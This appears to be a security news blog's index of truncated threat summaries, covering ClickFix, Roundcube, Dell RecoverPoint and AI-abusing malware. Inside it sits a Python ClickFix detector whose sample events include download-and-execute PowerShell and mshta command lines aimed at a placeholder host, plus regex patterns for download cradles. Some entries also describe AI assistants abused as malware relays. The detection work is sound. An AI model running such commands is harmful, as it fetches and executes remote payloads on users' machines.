
ALL POSTS

Researchers Expose 27 Critical Vulnerabilities in Top Password Managers

Key Findings:
• Researchers executed 27 successful attacks against the industry-leading password managers Bitwarden, LastPass, and Dashlane.
• The attacks show how compromised servers and design flaws can expose encrypted vault data.
• 1Password emerged as the most secure option due to its use of a Secret Key.
Background: We often treat cloud-based password managers as digital safes that only we can open. These services rely on Zero-Knowledge Encryption, a marketing promise that the company sto

New ClickFix Attack Targets Crypto Wallets and 25+ Browsers with Remote Access Trojan

Key Findings:
• A new scam targets users by mimicking CAPTCHA verification systems.
• The attack is an evolved version of the ClickFix attacks from early 2025 that targeted restaurant bookings.
• The multi-stage infection starts with a fake CAPTCHA, then triggers a PowerShell script to download malware.
• The malware, an infostealer, targets cryptocurrency wallets, browser login data, and other sensitive information.
Background: This research, shared with Hackread.com, indicates
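The infection chain above ends with a PowerShell download cradle that the victim launches from a fake CAPTCHA prompt. The detector below is an added example, not code from the original post or from the research it summarizes: it scores Windows process-creation events (Sysmon Event ID 1 / 4688-style fields, with the sample events constructed here) for the ClickFix signature of a scripting host spawned directly from the desktop shell with hidden-window, policy-bypass, encoded-command or download-and-execute arguments. The indicator list, weights and threshold are assumptions chosen for illustration, not a published rule set.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation events shaped like Sysmon EID 1 / Windows 4688
# fields. These are NOT logs from the article; they exist only to exercise the detector.
# Events 1, 2 and 4 are ClickFix-like; event 3 is a benign developer build step.
SAMPLE_EVENTS = [
    {   # victim pastes the "verification" command into the Win+R Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/captcha/verify.txt | iex"',
    },
    {   # mshta variant that pulls a remote HTA directly
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta https://example.invalid/verify",
    },
    {   # benign: build script launched by a developer tool, not from the shell
        "parent": r"C:\Program Files\Git\cmd\git.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell -NoProfile -File .\build.ps1",
    },
    {   # encoded-command variant launched from the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMA",
    },
]

# (name, weight, pattern). Weights are an assumption made for this example.
INDICATORS = [
    ("hidden_window",   1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass_policy",   1, re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("encoded_command", 2, re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", 1, re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b", re.I)),
    ("inline_exec",     1, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("mshta_remote",    2, re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I)),
]
# The Run dialog (Win+R) spawns its children under explorer.exe; a scripting host
# with that parent and no browser or document in between is the ClickFix lineage.
INTERACTIVE_PARENTS = {"explorer.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
INTERACTIVE_WEIGHT = 1


@dataclass
class Finding:
    cmdline: str
    score: int
    indicators: list = field(default_factory=list)


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(event: dict) -> tuple:
    """Score one process-creation event; returns (score, matched indicator names)."""
    hits, score = [], 0
    for name, weight, pattern in INDICATORS:
        if pattern.search(event["cmdline"]):
            hits.append(name)
            score += weight
    if _basename(event["parent"]) in INTERACTIVE_PARENTS and _basename(event["image"]) in LOLBINS:
        hits.append("interactive_parent")
        score += INTERACTIVE_WEIGHT
    return score, hits


def detect_clickfix(events, threshold: int = 3) -> list:
    """Return a Finding for every event whose weighted score reaches the threshold."""
    findings = []
    for ev in events:
        score, hits = analyze_event(ev)
        if score >= threshold:
            findings.append(Finding(ev["cmdline"], score, hits))
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"score={f.score} {f.indicators} :: {f.cmdline}")
```

The parent-process check does the heavy lifting: a download cradle in a build pipeline is normal, the same cradle spawned by explorer.exe a few seconds after a browser visit is not. In production the parent set would be tuned per environment (for example adding the browser-download path that some ClickFix variants use) and the threshold lowered once the benign baseline is known.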

CISA Adds Two Actively Exploited Roundcube Vulnerabilities to KEV Catalog

Key Findings:
• CISA has added two actively exploited vulnerabilities in the Roundcube webmail software to its Known Exploited Vulnerabilities (KEV) catalog.
• The vulnerabilities are CVE-2025-49113 (CVSS 9.9) and CVE-2025-68461 (CVSS 7.2).
• CVE-2025-49113 is a deserialization of untrusted data flaw that allows authenticated users to achieve remote code execution.
• CVE-2025-68461 is a cross-site scripting vulnerability in the "animate" tag of an SVG document.
• Attackers have already weaponized

AI-Assisted Threat Actor Compromises 600+ FortiGate Devices Globally

Key Findings:
• A Russian-speaking, financially motivated threat actor compromised over 600 FortiGate devices in 55 countries between January 11 and February 18, 2026.
• The threat actor used multiple commercial generative AI tools to automate stages of the attack cycle, including tool development, attack planning, and command generation.
• No exploitation of FortiGate vulnerabilities was observed; the campaign succeeded by exploiting exposed management por

Anthropic Introduces Embedded Security Scanning for Claude

Key Findings:
• Anthropic is rolling out a new security feature for Claude Code that can scan a user's software codebases for vulnerabilities and suggest patches.
• The feature, called Claude Code Security, will initially be available to a limited number of enterprise and team customers for testing.
• Claude Code Security goes beyond traditional static analysis by reasoning about the codebase like a human security researcher, understanding how components interact, tracing

Curated CVE Watch - CISA Known Exploited Vulnerabilities

Key Findings:
• The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities affecting the RoundCube Webmail platform to its Known Exploited Vulnerabilities (KEV) catalog.
• CVE-2025-49113 (CVSS score: 9.9): a deserialization of untrusted data vulnerability that allows remote code execution.
• CVE-2025-68461 (CVSS score: 7.2): a cross-site scripting (XSS) vulnerability.
• These vulnerabilities have been actively exploited b

FBI Warns of Escalating ATM Jackpotting Attacks, $20M Lost in 2025

Key Findings:
• The FBI has warned of a sharp rise in ATM jackpotting attacks across the U.S., with losses exceeding $20 million in 2025 alone.
• Since 2020, about 1,900 incidents have been reported, including 700 last year.
• Total losses tied to jackpotting have reached roughly $40.7 million since 2021.
Background: The jackpotting technique was first demonstrated by white-hat hacker Barnaby Jack in 2010. Ploutus is one of the most sophisticated ATM malware families and was first discovered in

Ukrainian Sentenced to 5 Years in Prison for North Korean Remote Work Scheme

Key Findings:
• Oleksandr Didenko, a 29-year-old Ukrainian national, was sentenced to 5 years in prison for his role in a scheme that helped North Korean IT workers gain remote employment at U.S. companies using stolen identities.
• Didenko created over 2,500 fraudulent accounts on job platforms, money transmitters, and social media to sell the stolen identities to North Korean operatives.
• He managed up to 871 identities through laptop farms in the U.S. and facilitated North Korean wo

PromptSpy: The Android Malware that Leverages Gemini AI for Persistent Access

Key Findings:
• PromptSpy is the first known Android malware to abuse Google's Gemini AI to maintain persistence on infected devices.
• It can capture lockscreen data, block uninstallation attempts, collect device information, take screenshots, and record screen activity as video.
• The malware sends the current screen to Gemini AI and asks it for step-by-step instructions on how to remain pinned in the recent apps list, preventing easy removal.
Background: ESET researc

Three Former Google Engineers Charged with Stealing Trade Secrets

Key Findings:
• Three Iranian-American engineers, Samaneh Ghandali, 41, her sister Soroor Ghandali, 32, and Samaneh's husband Mohammadjavad Khosravi, 40, have been indicted for allegedly stealing trade secrets from Google and other tech firms and transferring the information to unauthorized locations, including Iran.
• The defendants are accused of conspiracy to commit trade secret theft, theft and attempted theft of trade secrets, and obstruction of justice.
• Samaneh and Soroor

Defeating AI with AI

Key Findings:
• Generative AI and agentic AI are increasingly used by threat actors to conduct faster and more targeted attacks.
• One capability AI sharpens for threat actors is profiling employees and crafting tailored social engineering lures.
• AI can also be leveraged by defenders to turn the tables on threat actors and use their own tools against them.
Background: Threat actors are leveraging the advancements in AI, particularly generative AI and agentic

Dell RecoverPoint Flaw Exploited by China-Linked Hackers to Deploy GrimBolt Malware

Key Findings:
• The China-linked hacking group UNC6201 has been exploiting a zero-day vulnerability (CVE-2026-22769) in Dell RecoverPoint for Virtual Machines since at least 2024.
• The vulnerability is a hardcoded credential flaw that allows unauthenticated remote attackers to gain administrator-level access to affected systems.
• The hackers have used this access to deploy a novel backdoor called GrimBolt, which is more advanced and harder to detect than the previously used Bricks

Notepad++ Fixes Vulnerability Used to Hijack Update System

Key Findings:
• Notepad++ patched a vulnerability that attackers used to hijack its update system and deliver malware to targeted users.
• The attack involved an infrastructure-level compromise that allowed malicious actors to intercept and redirect update traffic destined for notepad-plus-plus.org.
• The compromise was linked to a likely China-linked APT group called Lotus Blossom, which has been active since 2009 and targets government, telecom, aviation, critical infrastructure, and m

APT Exploits Dell RecoverPoint Zero-Day Since 2024

Key Findings:
• A suspected China-linked APT group, UNC6201, has been exploiting a critical zero-day vulnerability in Dell RecoverPoint for Virtual Machines since mid-2024.
• The vulnerability, tracked as CVE-2026-22769, has a CVSS score of 10.0 and involves hardcoded credentials that can be abused to gain unauthorized access and root-level persistence.
• The group has used the flaw to move laterally, maintain persistence, and deploy malware including SLAYSTYLE, BRICKSTORM, and a no

Four VS Code Extensions with 125M+ Installs Contain Critical Flaws

Key Findings:
• Cybersecurity researchers have disclosed multiple security vulnerabilities in four popular Microsoft Visual Studio Code (VS Code) extensions with over 125 million collective installs.
• The vulnerable extensions are Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview.
• If successfully exploited, these vulnerabilities could allow threat actors to steal local files and execute code remotely.
• The researchers warn that a single malicious exte

Chinese hackers exploited a Dell zero-day for 18 months before Dell patched it

Key Findings:
• Chinese state-sponsored hackers, suspected to be part of the UNC6201 group, have been exploiting a zero-day vulnerability in Dell RecoverPoint for Virtual Machines since mid-2024.
• The vulnerability, CVE-2026-22769, has a CVSS score of 10/10 and allows unauthenticated remote attackers to gain full system access with root-level persistence.
• The hackers have been using a hardcoded administrator password, pulled from Apache Tomcat, to trigger the vulnerability for at

Researchers Show Copilot and Grok Can Be Abused as Malware Proxies

Key Findings:
• Cybersecurity researchers have demonstrated that AI assistants with web browsing or URL fetching capabilities, such as Microsoft Copilot and xAI Grok, can be abused as covert command-and-control (C2) relays.
• The technique lets attackers blend their malicious communications into legitimate-looking AI assistant traffic, making detection and blocking significantly more challenging.
• The attack method, dubbed "AI as a C2 proxy," leverages the web ac

SmartLoader Abuses Oura MCP to Deploy StealC Malware

Key Findings:
• SmartLoader hackers cloned a legitimate Oura MCP (Model Context Protocol) server and built a deceptive infrastructure of fake forks and contributors to make the project appear credible.
• The trojanized version of the Oura MCP server delivers the StealC information stealer, targeting developer credentials, browser passwords, and cryptocurrency wallets.
• This campaign signals a significant shift in the threat landscape, with traditional supply chain attackers now piv

Phobos Ransomware Affiliate Arrested by Polish Authorities

Key Findings:
• Polish authorities have arrested a 47-year-old man accused of being an affiliate of the Phobos ransomware group.
• The suspect faces up to five years in prison for producing, obtaining, and sharing computer programs used to conduct cyberattacks.
• The arrest was part of a larger Europol-led operation called "Phobos Aetor" that targeted individuals involved in Phobos ransomware attacks.
Background: Phobos ransomware has claimed over 1,000 victims globally and receiv

Infostealer Malware Steals OpenClaw AI Agent Configuration Files and Gateway Tokens

Key Findings:
• Cybersecurity researchers have uncovered a new information stealer that exfiltrated a victim's OpenClaw configuration environment.
• The incident marks a significant evolution in infostealer behavior, from stealing browser credentials to targeting the identities, settings, and "digital souls" of personal AI agents.
• The stolen files included openclaw.json with gateway tokens, device.json containing private cryptographic keys, and "soul" and memory file


© 2025 by Explain IT Again.
